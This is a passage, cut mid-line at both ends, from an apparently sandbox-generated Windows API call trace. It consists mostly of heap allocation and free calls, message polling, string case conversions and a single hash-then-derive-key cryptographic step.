(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0208.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0208.335] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.335] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.335] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.335] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.335] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0208.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.336] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.336] CryptHashData (hHash=0xaa59a0, pbData=0x24b18c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0208.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0208.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0208.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0208.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0208.337] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0208.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0208.337] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.338] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0208.338] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.338] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0208.338] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.338] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.338] CryptDeriveKey (in: hProv=0xad2720, Algid=0x6601, hBaseData=0xaa59a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0208.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0208.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0208.342] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0208.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.344] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0208.344] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0208.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.345] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.345] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.345] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.345] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0208.346] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, 